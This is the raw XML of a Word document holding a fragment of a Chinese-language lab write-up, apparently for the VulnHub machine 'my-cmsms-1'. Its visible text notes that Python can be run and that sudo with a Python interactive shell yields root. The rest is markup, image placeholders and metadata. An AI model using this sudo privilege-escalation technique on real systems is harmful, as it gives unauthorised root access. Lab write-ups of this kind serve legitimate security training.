        </w:rPr>
        <w:t>看看能不能运行，发现可以直接运行Python那就是送了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CAF4A" w14:textId="4329B1C9" w:rsidR="009F4FA6" w:rsidRDefault="009F4FA6" w:rsidP="009F4FA6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4069B619" wp14:editId="5141B518">
            <wp:extent cx="4743694" cy="84459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4868" w14:textId="3CFE55B9" w:rsidR="009F4FA6" w:rsidRDefault="009F4FA6" w:rsidP="009F4FA6"/>
    <w:p w14:paraId="042B7E64" w14:textId="0D945A8E" w:rsidR="009F4FA6" w:rsidRDefault="009F4FA6" w:rsidP="009F4FA6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">udo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+一条python交互式shell直接得到root权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F62A4AC" w14:textId="7434EAAE" w:rsidR="009F4FA6" w:rsidRPr="009F4FA6" w:rsidRDefault="009F4FA6" w:rsidP="009F4FA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D1C0634" wp14:editId="5194A854">
            <wp:extent cx="5274310" cy="26670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4FA6" w:rsidRPr="009F4F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F21"/>
    <w:rsid w:val="00057BC1"/>
    <w:rsid w:val="00207336"/>
    <w:rsid w:val="00334EBE"/>
    <w:rsid w:val="007048A3"/>
    <w:rsid w:val="00727F21"/>
    <w:rsid w:val="00785E3A"/>
    <w:rsid w:val="00917B06"/>
    <w:rsid w:val="009F0C3C"/>
    <w:rsid w:val="009F4FA6"/>
    <w:rsid w:val="00B95F4D"/>
    <w:rsid w:val="00D6536E"/>
    <w:rsid w:val="00D94EEF"/>
    <w:rsid w:val="00F65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12344"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4882F249-BD4D-427A-AAC7-761F7A781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6536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6536E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D6536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653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vulnhub.com/entry/my-cmsms-1,498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1</Pages>
  <Words>221</Words>
  <Characters>1262</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop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wangc</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>wangc</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-16T00:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-16T13:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>